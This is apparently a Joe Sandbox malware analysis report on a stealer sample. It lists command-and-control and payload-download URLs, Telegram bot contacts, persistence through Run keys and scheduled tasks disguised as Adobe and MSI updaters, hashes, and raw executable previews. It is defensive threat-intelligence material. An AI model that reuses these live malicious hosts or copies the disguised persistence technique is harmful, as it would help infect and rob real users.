https://t.me/RiseProSUPPORTrh	RegAsm.exe, 0000002C.00000002.3509342638.000000000150A000.00000004.00000020.00020000.00000000.sdmp	false		high
https://db-ip.com/demo/home.php?s=84.17.40.101(	RegAsm.exe, 0000002A.00000002.3509011004.000000000126F000.00000004.00000020.00020000.00000000.sdmp	false		high
https://db-ip.com/demo/home.php?s=84.17.40.101)	MSIUpdaterV1.exe, 00000009.00000002.3506110613.0000000001694000.00000004.00000020.00020000.00000000.sdmp	false		high
https://t.me/risepro_bot_M	MSIUpdaterV1.exe, 00000009.00000002.3506110613.0000000001694000.00000004.00000020.00020000.00000000.sdmp	false		high
http://upx.sf.net	Amcache.hve.29.dr	false		high
http://193.233.132.253/lumma2804.exed	OJa1BOigU3.exe, 00000000.00000002.2346732102.0000000005E30000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://ipinfo.io/Mozilla/5.0	OJa1BOigU3.exe, 00000000.00000002.2346129634.0000000001515000.00000004.00000020.00020000.00000000.sdmp, 3Q7v9y6Zw0a51Z43zHih.exe, 00000008.00000002.3505645957.0000000001D45000.00000004.00000020.00020000.00000000.sdmp, MSIUpdaterV1.exe, 00000009.00000002.3506110613.0000000001687000.00000004.00000020.00020000.00000000.sdmp, MSIUpdaterV1.exe, 0000000A.00000002.3505760819.000000000171A000.00000004.00000020.00020000.00000000.sdmp, AdobeUpdaterV1.exe, 00000018.00000002.3505470905.0000000001353000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000019.00000002.3510229323.0000000000F11000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000002A.00000002.3509011004.000000000126F000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000002C.00000002.3509342638.000000000158F000.00000004.00000020.00020000.00000000.sdmp	false		high
https://ipinfo.io/widget/demo/84.17.40.101P	AdobeUpdaterV1.exe, 00000018.00000002.3505470905.000000000132D000.00000004.00000020.00020000.00000000.sdmp	false		high
https://miniaturefinerninewjs.shop:443/api	RegAsm.exe, 00000011.00000002.2649795741.0000000002FBE000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000029.00000002.2784153638.0000000000E51000.00000004.00000020.00020000.00000000.sdmp	false	10%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://t.me/risepro_botisepro_botC	MSIUpdaterV1.exe, 00000009.00000002.3506110613.0000000001694000.00000004.00000020.00020000.00000000.sdmp	false		high

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
5.42.66.10	unknown	Russian Federation	39493	RU-KSTVKolomnaGroupofcompaniesGuarantee-tvRU	false
34.117.186.192	ipinfo.io	United States	139070	GOOGLE-AS-APGoogleAsiaPacificPteLtdSG	false
193.233.132.226	unknown	Russian Federation	2895	FREE-NET-ASFREEnetEU	true
104.26.5.15	db-ip.com	United States	13335	CLOUDFLARENETUS	false
193.233.132.253	unknown	Russian Federation	2895	FREE-NET-ASFREEnetEU	false
104.21.30.191	miniaturefinerninewjs.shop	United States	13335	CLOUDFLARENETUS	true

General Information

Joe Sandbox version:	40.0.0 Tourmaline
Analysis ID:	1436604
Start date and time:	2024-05-06 07:51:20 +02:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 11m 51s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Run name:	Run with higher sleep bypass
Number of analysed new started processes analysed:	51
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	OJa1BOigU3.exe renamed because original name is a hash value
Original Sample Name:	5158fed3ee415791bb7a7a3712373383.exe
Detection:	MAL
Classification:	mal100.troj.spyw.evad.winEXE@65/57@4/6
EGA Information:	Successful, ratio: 50%
HCA Information:	Successful, ratio: 71% Number of executed functions: 33 Number of non-executed functions: 210
Cookbook Comments:	Found application associated with file extension: .exe Sleeps bigger than 100000000ms are automatically reduced to 1000ms

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, WerFault.exe, SIHClient.exe, conhost.exe, svchost.exe
Excluded IPs from analysis (whitelisted): 52.182.143.212, 52.168.117.173
Excluded domains from analysis (whitelisted): onedsblobprdeus16.eastus.cloudapp.azure.com, ocsp.digicert.com, onedsblobprdcus15.centralus.cloudapp.azure.com, slscr.update.microsoft.com, login.live.com, blobcollector.events.data.trafficmanager.net, ctldl.windowsupdate.com, umwatson.events.data.microsoft.com, fe3cr.delivery.mp.microsoft.com
Execution Graph export aborted for target MSIUpdaterV1.exe, PID 4412 because there are no executed function
Execution Graph export aborted for target v6ggwc2fJXXgIu5fzDQ2.exe, PID 5076 because there are no executed function
HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
HTTPS proxy raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
Not all processes where analyzed, report is missing behavior information
Report creation exceeded maximum time and may have missing disassembly code information.
Report size exceeded maximum capacity and may have missing behavior information.
Report size exceeded maximum capacity and may have missing network information.
Report size getting too big, too many NtCreateFile calls found.
Report size getting too big, too many NtOpenFile calls found.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryValueKey calls found.

Simulations

Behavior and APIs

Time	Type	Description
06:53:08	Autostart	Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run AdobeUpdaterV1_b169c3872385b2c3c15a1f5f96f34ffe C:\Users\user\AppData\Local\AdobeUpdaterV1_b169c3872385b2c3c15a1f5f96f34ffe\AdobeUpdaterV1.exe
06:53:09	Task Scheduler	Run new task: MSIUpdaterV1_b169c3872385b2c3c15a1f5f96f34ffe HR path: C:\ProgramData\MSIUpdaterV1_b169c3872385b2c3c15a1f5f96f34ffe\MSIUpdaterV1.exe
06:53:09	Task Scheduler	Run new task: MSIUpdaterV1_b169c3872385b2c3c15a1f5f96f34ffe LG path: C:\ProgramData\MSIUpdaterV1_b169c3872385b2c3c15a1f5f96f34ffe\MSIUpdaterV1.exe
06:53:14	Task Scheduler	Run new task: MSIUpdaterV1_209ffc424b0966fd64861c7290d2a06a HR path: C:\ProgramData\MSIUpdaterV1_209ffc424b0966fd64861c7290d2a06a\MSIUpdaterV1.exe
06:53:21	Task Scheduler	Run new task: MSIUpdaterV1_209ffc424b0966fd64861c7290d2a06a LG path: C:\ProgramData\MSIUpdaterV1_209ffc424b0966fd64861c7290d2a06a\MSIUpdaterV1.exe
06:53:21	Autostart	Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run AdobeUpdaterV1_93c4750d07be7885c8f839a66372e48f C:\Users\user\AppData\Local\AdobeUpdaterV1_93c4750d07be7885c8f839a66372e48f\AdobeUpdaterV1.exe
06:53:22	Task Scheduler	Run new task: MSIUpdaterV1_93c4750d07be7885c8f839a66372e48f HR path: C:\ProgramData\MSIUpdaterV1_93c4750d07be7885c8f839a66372e48f\MSIUpdaterV1.exe
06:53:22	Task Scheduler	Run new task: MSIUpdaterV1_93c4750d07be7885c8f839a66372e48f LG path: C:\ProgramData\MSIUpdaterV1_93c4750d07be7885c8f839a66372e48f\MSIUpdaterV1.exe
06:53:25	Task Scheduler	Run new task: MPGPH1 HR path: C:\ProgramData\MPGPH1\MPGPH1.exe
06:53:25	Task Scheduler	Run new task: MPGPH1 LG path: C:\ProgramData\MPGPH1\MPGPH1.exe
06:53:30	Autostart	Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run AdobeUpdaterV1_209ffc424b0966fd64861c7290d2a06a C:\Users\user\AppData\Local\AdobeUpdaterV1_209ffc424b0966fd64861c7290d2a06a\AdobeUpdaterV1.exe
06:53:38	Autostart	Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run RageMP1 C:\Users\user\AppData\Local\RageMP1\RageMP1.exe
06:53:48	Autostart	Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run AdobeUpdaterV1_b169c3872385b2c3c15a1f5f96f34ffe C:\Users\user\AppData\Local\AdobeUpdaterV1_b169c3872385b2c3c15a1f5f96f34ffe\AdobeUpdaterV1.exe
06:53:58	Autostart	Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run AdobeUpdaterV1_93c4750d07be7885c8f839a66372e48f C:\Users\user\AppData\Local\AdobeUpdaterV1_93c4750d07be7885c8f839a66372e48f\AdobeUpdaterV1.exe
06:54:06	Autostart	Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run AdobeUpdaterV1_209ffc424b0966fd64861c7290d2a06a C:\Users\user\AppData\Local\AdobeUpdaterV1_209ffc424b0966fd64861c7290d2a06a\AdobeUpdaterV1.exe
06:54:16	Autostart	Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run RageMP1 C:\Users\user\AppData\Local\RageMP1\RageMP1.exe
07:54:07	API Interceptor	259x Sleep call for process: RegAsm.exe modified
07:54:07	API Interceptor	152x Sleep call for process: 3Q7v9y6Zw0a51Z43zHih.exe modified
07:54:13	API Interceptor	109x Sleep call for process: AdobeUpdaterV1.exe modified
07:54:26	API Interceptor	8x Sleep call for process: MSIUpdaterV1.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
5.42.66.10	tZvjMg3Hw9.exe	Get hash	malicious	PureLog Stealer, RedLine, RisePro Stealer, Vidar, zgRAT	Browse	5.42.66.10/ext/adsupressor.jpeg
	WlCIinu0yp.exe	Get hash	malicious	LummaC Stealer, PureLog Stealer, RedLine, RisePro Stealer, Socks5Systemz, Vidar, zgRAT	Browse	5.42.66.10/api/flash.php
	file.exe	Get hash	malicious	LummaC, PureLog Stealer, RedLine, RisePro Stealer, Vidar, zgRAT	Browse	5.42.66.10/download/th/retail.php
	SecuriteInfo.com.Trojan.Siggen28.25504.27914.23637.exe	Get hash	malicious	Glupteba, LummaC Stealer, Mars Stealer, PureLog Stealer, RedLine, RisePro Stealer, SmokeLoader	Browse	5.42.66.10/api/flash.php
	80OrFCsz0u.exe	Get hash	malicious	GCleaner, Glupteba, LummaC Stealer, Mars Stealer, PureLog Stealer, RedLine, RisePro Stealer	Browse	5.42.66.10/api/flash.php
	SecuriteInfo.com.Win64.Evo-gen.28136.30716.exe	Get hash	malicious	GCleaner, Glupteba, LummaC Stealer, Mars Stealer, PureLog Stealer, RedLine, RisePro Stealer	Browse	5.42.66.10/download/th/Retailer_prog.exe
	5NlNJIHhTf.exe	Get hash	malicious	Unknown	Browse	5.42.66.10/download/th/getimage15.php
	file.exe	Get hash	malicious	Unknown	Browse	5.42.66.10/api/flash.php
34.117.186.192	SecuriteInfo.com.Win32.Evo-gen.24318.16217.exe	Get hash	malicious	Unknown	Browse	ipinfo.io/json
	SecuriteInfo.com.Win32.Evo-gen.28489.31883.exe	Get hash	malicious	Unknown	Browse	ipinfo.io/json
	Raptor.HardwareService.Setup 1.msi	Get hash	malicious	Unknown	Browse	ipinfo.io/ip
	Conferma_Pdf_Editor.exe	Get hash	malicious	Planet Stealer	Browse	ipinfo.io/
	Conferma_Pdf_Editor.exe	Get hash	malicious	Planet Stealer	Browse	ipinfo.io/
	w.sh	Get hash	malicious	Xmrig	Browse	/ip
	Raptor.HardwareService.Setup_2.3.6.0.msi	Get hash	malicious	Unknown	Browse	ipinfo.io/ip
	Raptor.HardwareService.Setup_2.3.6.0.msi	Get hash	malicious	Unknown	Browse	ipinfo.io/ip
	uUsgzQ3DoW.exe	Get hash	malicious	RedLine	Browse	ipinfo.io/ip
	8BZBgbeCcz.exe	Get hash	malicious	RedLine	Browse	ipinfo.io/ip

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
ipinfo.io	https://reactivate-account.live/	Get hash	malicious	Unknown	Browse	34.117.186.192
	wNyot4Puq5.exe	Get hash	malicious	DCRat, PureLog Stealer, zgRAT	Browse	34.117.186.192
	SecuriteInfo.com.Win32.Malware-gen.14907.28959.exe	Get hash	malicious	Unknown	Browse	34.117.186.192
	SecuriteInfo.com.Win32.Malware-gen.14907.28959.exe	Get hash	malicious	Unknown	Browse	34.117.186.192
	SecuriteInfo.com.Win32.PWSX-gen.11739.16980.exe	Get hash	malicious	RisePro Stealer	Browse	34.117.186.192
	file.exe	Get hash	malicious	RisePro Stealer	Browse	34.117.186.192
	vEaFCBsRb7.exe	Get hash	malicious	RisePro Stealer	Browse	34.117.186.192
	oO2wHSVFJM.exe	Get hash	malicious	RisePro Stealer	Browse	34.117.186.192
	hYrJbjnzVc.exe	Get hash	malicious	RisePro Stealer	Browse	34.117.186.192
db-ip.com	SecuriteInfo.com.Win32.PWSX-gen.11739.16980.exe	Get hash	malicious	RisePro Stealer	Browse	104.26.5.15
	file.exe	Get hash	malicious	RisePro Stealer	Browse	104.26.4.15
	vEaFCBsRb7.exe	Get hash	malicious	RisePro Stealer	Browse	172.67.75.166
	oO2wHSVFJM.exe	Get hash	malicious	RisePro Stealer	Browse	104.26.5.15
	4yFaZU8fhT.exe	Get hash	malicious	RisePro Stealer	Browse	104.26.5.15
	RY5YJaMEWE.exe	Get hash	malicious	RisePro Stealer	Browse	172.67.75.166
	OUZXNOqKXg.exe	Get hash	malicious	RisePro Stealer	Browse	104.26.5.15
	0BzQNa8hYd.exe	Get hash	malicious	RisePro Stealer	Browse	172.67.75.166
	3CkMJ4UkNy.exe	Get hash	malicious	RisePro Stealer	Browse	104.26.4.15

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
RU-KSTVKolomnaGroupofcompaniesGuarantee-tvRU	file.exe	Get hash	malicious	RedLine	Browse	5.42.65.96
	file.exe	Get hash	malicious	RedLine	Browse	5.42.65.96
	tZvjMg3Hw9.exe	Get hash	malicious	PureLog Stealer, RedLine, RisePro Stealer, Vidar, zgRAT	Browse	5.42.66.10
	[V2]launcher.exe	Get hash	malicious	PureLog Stealer, RedLine, Xmrig	Browse	45.15.156.167
	SecuriteInfo.com.Trojan.PWS.Siggen3.32416.6905.9348.exe	Get hash	malicious	RedLine	Browse	5.42.65.101
	file.exe	Get hash	malicious	RedLine	Browse	5.42.65.96
	VOrqSh1Fts.exe	Get hash	malicious	Neoreklami, PureLog Stealer	Browse	5.42.66.10
	WlCIinu0yp.exe	Get hash	malicious	LummaC Stealer, PureLog Stealer, RedLine, RisePro Stealer, Socks5Systemz, Vidar, zgRAT	Browse	5.42.66.10
	file.exe	Get hash	malicious	LummaC, GCleaner, Glupteba, LummaC Stealer, Mars Stealer, PureLog Stealer, RedLine	Browse	5.42.65.64
	file.exe	Get hash	malicious	RedLine	Browse	5.42.65.96
FREE-NET-ASFREEnetEU	9vZbHuuOq6.exe	Get hash	malicious	RisePro Stealer	Browse	193.233.132.253
	ABD88D155FC99F529EDC0F725A4151C61126B7890BC6B.exe	Get hash	malicious	DCRat	Browse	147.45.44.3
	1CMweaqlKp.exe	Get hash	malicious	LummaC, Amadey, LummaC Stealer, Mars Stealer, RedLine, RisePro Stealer, SmokeLoader	Browse	147.45.47.93
	SecuriteInfo.com.Win32.PWSX-gen.11739.16980.exe	Get hash	malicious	RisePro Stealer	Browse	147.45.47.93
	file.exe	Get hash	malicious	RisePro Stealer	Browse	147.45.47.93
	vEaFCBsRb7.exe	Get hash	malicious	RisePro Stealer	Browse	147.45.47.93
	oO2wHSVFJM.exe	Get hash	malicious	RisePro Stealer	Browse	147.45.47.93
	hYrJbjnzVc.exe	Get hash	malicious	RisePro Stealer	Browse	147.45.47.93
	KhbShPK91I.exe	Get hash	malicious	Unknown	Browse	193.233.132.56
GOOGLE-AS-APGoogleAsiaPacificPteLtdSG	https://reactivate-account.live/	Get hash	malicious	Unknown	Browse	34.117.186.192
	wNyot4Puq5.exe	Get hash	malicious	DCRat, PureLog Stealer, zgRAT	Browse	34.117.186.192
	SecuriteInfo.com.Win32.Malware-gen.14907.28959.exe	Get hash	malicious	Unknown	Browse	34.117.186.192
	SecuriteInfo.com.Win32.Malware-gen.14907.28959.exe	Get hash	malicious	Unknown	Browse	34.117.186.192
	1CMweaqlKp.exe	Get hash	malicious	LummaC, Amadey, LummaC Stealer, Mars Stealer, RedLine, RisePro Stealer, SmokeLoader	Browse	34.117.186.192
	SecuriteInfo.com.Win32.PWSX-gen.11739.16980.exe	Get hash	malicious	RisePro Stealer	Browse	34.117.186.192
	https://herozheng.com/	Get hash	malicious	Unknown	Browse	34.117.152.183
	file.exe	Get hash	malicious	RisePro Stealer	Browse	34.117.186.192
	https://wywljs.com/	Get hash	malicious	Unknown	Browse	34.117.152.183
CLOUDFLARENETUS	https://us06web.zoom.us/webinar/register/WN_ozauON07SWuCo9QWQ_DMsg	Get hash	malicious	Unknown	Browse	172.64.150.44
	http://www.ewrb.co.nz	Get hash	malicious	Unknown	Browse	162.247.243.39
	73zGJqwgDy.exe	Get hash	malicious	MofongoLoader	Browse	172.67.174.47
	J5kltefeTK.exe	Get hash	malicious	MofongoLoader	Browse	104.21.30.238
	qxn9Zvy1at.exe	Get hash	malicious	MofongoLoader	Browse	172.67.214.45
	https://reactivate-account.live/	Get hash	malicious	Unknown	Browse	172.67.74.152
	https://rkr.wyd.mybluehost.me/bont/off/MTTRBDFH/index.php?FGDD=1	Get hash	malicious	HTMLPhisher	Browse	104.17.25.14
	https://igrejavideiravl.com/css/MTTRBDFH/index.php?FGDD=1	Get hash	malicious	HTMLPhisher	Browse	104.17.25.14
	http://hotwaterspecialistsydney.com.au	Get hash	malicious	Unknown	Browse	104.18.10.207

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
a0e9f5d64349fb13191bc781f81f42e1	app.exe	Get hash	malicious	Unknown	Browse	104.26.5.15 34.117.186.192 104.21.30.191
	Template_signed_0405.dotm.doc	Get hash	malicious	Unknown	Browse	104.26.5.15 34.117.186.192 104.21.30.191
	SecuriteInfo.com.Variant.Lazy.387025.32273.29448.exe	Get hash	malicious	RedLine	Browse	104.26.5.15 34.117.186.192 104.21.30.191
	SecuriteInfo.com.Win32.Evo-gen.17272.18065.exe	Get hash	malicious	LummaC	Browse	104.26.5.15 34.117.186.192 104.21.30.191
	SecuriteInfo.com.Trojan.NSIS.Agent.20411.3944.exe	Get hash	malicious	LummaC	Browse	104.26.5.15 34.117.186.192 104.21.30.191
	Pedido-Faturado-398731.msi	Get hash	malicious	Unknown	Browse	104.26.5.15 34.117.186.192 104.21.30.191
	PIO88938MB.docx.doc	Get hash	malicious	Unknown	Browse	104.26.5.15 34.117.186.192 104.21.30.191
	NFs_98776.msi	Get hash	malicious	VMdetect	Browse	104.26.5.15 34.117.186.192 104.21.30.191
	taEPf27YpR.xll	Get hash	malicious	Unknown	Browse	104.26.5.15 34.117.186.192 104.21.30.191

Dropped Files

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link
C:\ProgramData\MPGPH1\MPGPH1.exe	S847453-receipt.vbs	Get hash	malicious	XWorm	Browse
	7sYKxZWLgw.exe	Get hash	malicious	PureLog Stealer	Browse
	55wj9QSq9c.exe	Get hash	malicious	RedLine	Browse
	Celery.exe	Get hash	malicious	PureLog Stealer, RedLine, zgRAT	Browse
	qBSw7aeXEM.exe	Get hash	malicious	RedLine	Browse
	AWB NO. 077-57676135.exe	Get hash	malicious	AgentTesla	Browse
	z4aHc5RDMN.exe	Get hash	malicious	RedLine	Browse
	hesaphareketi-01.pdf.SCR.exe	Get hash	malicious	AgentTesla	Browse
	hesaphareketi_1.SCR.exe	Get hash	malicious	AgentTesla	Browse
	remasdasd.exe	Get hash	malicious	XWorm	Browse

Created / dropped Files

C:\ProgramData\MPGPH1\MPGPH1.exe

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
File Type:	PE32 executable (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	65440
Entropy (8bit):	6.049806962480652
Encrypted:	false
SSDEEP:	768:X8XcJiMjm2ieHlPyCsSuJbn8dBhFwlSMF6Iq8KSYDKbQ22qWqO8w1R:rYMaNylPYSAb8dBnsHsPDKbQBqTY
MD5:	0D5DF43AF2916F47D00C1573797C1A13
SHA1:	230AB5559E806574D26B4C20847C368ED55483B0
SHA-256:	C066AEE7AA3AA83F763EBC5541DAA266ED6C648FBFFCDE0D836A13B221BB2ADC
SHA-512:	F96CF9E1890746B12DAF839A6D0F16F062B72C1B8A40439F96583F242980F10F867720232A6FA0F7D4D7AC0A7A6143981A5A130D6417EA98B181447134C7CFE2
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0% Antivirus: Virustotal, Detection: 0%, Browse
Joe Sandbox View:	Filename: S847453-receipt.vbs, Detection: malicious, Browse Filename: 7sYKxZWLgw.exe, Detection: malicious, Browse Filename: 55wj9QSq9c.exe, Detection: malicious, Browse Filename: Celery.exe, Detection: malicious, Browse Filename: qBSw7aeXEM.exe, Detection: malicious, Browse Filename: AWB NO. 077-57676135.exe, Detection: malicious, Browse Filename: z4aHc5RDMN.exe, Detection: malicious, Browse Filename: hesaphareketi-01.pdf.SCR.exe, Detection: malicious, Browse Filename: hesaphareketi_1.SCR.exe, Detection: malicious, Browse Filename: remasdasd.exe, Detection: malicious, Browse
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....<.]..............0.............^.... ........@.. ....................... .......F....`.....................................O.......8................A........................................................... ............... ..H............text...d.... ...................... ..`.rsrc...8...........................@..@.reloc..............................@..B................@.......H........A...p..........T................................................~P...-.r...p.....(....(....s.....P.....0.."........(......-.r...p.rI..p(....s....z....0..........(....~P.....o........(....n(.....(..........%...(....~(.....(..........%...%...(.....(.....(..........%...%...%...(....V.(......}Q.....}R.....{Q.....{R......0...........(.......i.=...}S......i.@...}T......i.@...}U.....+m...(....o .....r]..p.o!...,..{T.......{U........o"....+(.ra..p.o!...,..{T.......

C:\ProgramData\MSIUpdaterV1_209ffc424b0966fd64861c7290d2a06a\MSIUpdaterV1.exe

Download File

Process:	C:\Users\user\Desktop\OJa1BOigU3.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	1896048
Entropy (8bit):	7.954279347337501
Encrypted:	false
SSDEEP:	49152:Foa3d+XWOTnKjKZpLq2FDwCfy90x87tSbervz8jyrHPmr7r:FoyddOTnK0LNcDeMAerL8ebPMn
MD5:	3A2BDF3F22AF20AE6E0F2552C9301222
SHA1:	D0FB7F1B437D2C06D9563855D797A41BBCC8FEEF
SHA-256:	B7874820D3ED5758EF459882D3C3D540ACF1E6170F4EA7DC1CC6168544B18C2B
SHA-512:	FBB173F5DF2E0FD0A842E1ED3249F4BB036734105F6D2ADAE8510F25E4CCECC0FEC9737FD110E84C3EAA4F9BB3C54598320194FC51D3C471F851FF8CA2ADB847
Malicious:	true
Yara Hits:	Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\ProgramData\MSIUpdaterV1_209ffc424b0966fd64861c7290d2a06a\MSIUpdaterV1.exe, Author: Joe Security
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 62% Antivirus: Virustotal, Detection: 60%, Browse
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........c,.i...i...i..C..~.i..C..~:i..C..~.i..R..~.i..R..~.i..C..~.i...i...i..R..~.i..c..~.i..c....i..c..~.i..Rich.i..........................PE..L.....6f...............'.^...v...............p....@......................................@.....................................<.......................p&..........................................0...@............p..<............................text...1\.......^.................. ..`.rdata.......p.......b..............@..@.data.... ... ......................@....bss........P......................@....rsrc...............................@..@.reloc..............................@..B........................................................................................................................................................................................................................................................

C:\ProgramData\MSIUpdaterV1_93c4750d07be7885c8f839a66372e48f\MSIUpdaterV1.exe

Download File

Process:	C:\Users\user\Desktop\OJa1BOigU3.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	483440
Entropy (8bit):	7.62615419370465
Encrypted:	false
SSDEEP:	12288:ub3IzlSJCfjT1CDcLfSsYxolZ0B3HpCO00N4:ub3gMMT1iqSRxovg3HE+4
MD5:	46C72D686C836F3C97CE18B81B0D9864
SHA1:	FDADD2E3CD971CD9FFFB3DE0F4A69ED0F77AE4A5
SHA-256:	DEAF3E009A0A9DF61E84C2BEFDB5DB10599F47C03FBDEFBBDCE83AAC3A969CD1
SHA-512:	1AB8C8967155913C5DD0E2853D663BB096571062680DE246FDDA370947F7B6C3D2F44B85BE97B821C630A4A42B3990D78601615737C3CED1418C9CCF18611208
Malicious:	true
Antivirus:	Antivirus: Virustotal, Detection: 30%, Browse
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....7f.................0...........N... ...`....@.. ....................................`..................................N..K....`..<............:..p&..........GN............................................... ............... ..H............text........ ...0.................. ..`.rsrc...<....`.......2..............@..@.reloc...............8..............@..B.................N......H.......4Q...................#...........................................0..j.......~....:_.........~....(.... .... .... ....s....~....(............~....(....~....(.... ....?....r...ps....z...(........]*....0............i. .......... .............8X........:........d....~....(......~....(....&.........8..........(...........~....(......X.. ....?........8B........ ....;...... ....;............XX.. ....]...................X.. ....?...........8.......8......X ....].....X ....]

C:\ProgramData\MSIUpdaterV1_b169c3872385b2c3c15a1f5f96f34ffe\MSIUpdaterV1.exe

Download File

Process:	C:\Users\user\Desktop\OJa1BOigU3.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	6990616
Entropy (8bit):	7.983839049537993
Encrypted:	false
SSDEEP:	196608:E9NDuIIL6QK4nK4emAWV3ogzbxfZdszlydO:2EL6lsKDmztogzblZdEn
MD5:	5158FED3EE415791BB7A7A3712373383
SHA1:	B21E19150DD6DF55B4578849FC4B6266E5B90829
SHA-256:	E3EEA6EF7EF2314970047B0A887C67D780EED12D40D5931E0A3E72061DE5E746
SHA-512:	498B4F7C867181C63F6C3D3243D5ADE76EE5874B65F7273CFE0AE32B52EEED9009443A2F315A1815B45A7542C1673F2B0B5119727146BFFB91F255BF54391C28
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 45% Antivirus: Virustotal, Detection: 42%, Browse
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....96f...............'.....>....................@.................................A]k...@.................................PUO.@........_...........Jj..a...................................K.......g..@.............N.......@....................text.............................. ..`.rdata..2~..........................@..@.data...0I...P......................@....vmp....5......................... ..`.vmp..,.....N.....................@....vmp..@.\...N...\................. ..`.reloc................\.............@..@.rsrc...._.......`....\.............@..@................................................................................................................................................................................................................................................................................................................

C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_MSIUpdaterV1.exe_f9eb3d1e2eda166485f639133f6bde09db46edb_bdfd7a68_899606cd-84e4-4b77-a8a7-4c234ca106ec\Report.wer

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	0.7263123495211595
Encrypted:	false
SSDEEP:	96:jcFJAw4/sGtqp8XqEfN+QXIDcQNc63cErcw3q+HbHgnoW6HeOyusr6ZAX/d5FMTz:w8w4/aBQ0jzxPjzAzuiFvZ24IO8d
MD5:	B956327FE18D9441E544FD3F29640F02
SHA1:	EBA6A86BF691EE56EED721ED9D363A64224E3B3B
SHA-256:	74624DFB59156200A0274F632D384E6130FFE1860636EF3C6F2959B1694AA960
SHA-512:	5F129CDD9F65998D33D26E3EE1B418F944A92CE03021CDB898AC0A74B7772F90A9C2C90404B248C0DB4E25E745DBD0768132A1730F47FE8665F0C3A5EFA274B0
Malicious:	false
Preview:	..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.3.5.9.4.4.8.4.1.1.1.1.8.9.7.7.8.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.5.9.4.4.8.4.1.2.2.1.2.7.4.3.7.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.8.9.9.6.0.6.c.d.-.8.4.e.4.-.4.b.7.7.-.a.8.a.7.-.4.c.2.3.4.c.a.1.0.6.e.c.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.4.a.9.6.d.c.0.1.-.6.0.c.6.-.4.b.3.c.-.a.3.f.a.-.4.9.f.6.d.b.9.8.9.c.4.a.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.M.S.I.U.p.d.a.t.e.r.V.1...e.x.e.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e.=.A.U.T.O.F.M.T...E.X.E.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.0.c.b.0.-.0.0.0.1.-.0.0.1.4.-.9.7.c.9.-.e.6.b.3.7.9.9.f.d.a.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.e.0.9.c.7.0.1.5.2.1.1.1.1.7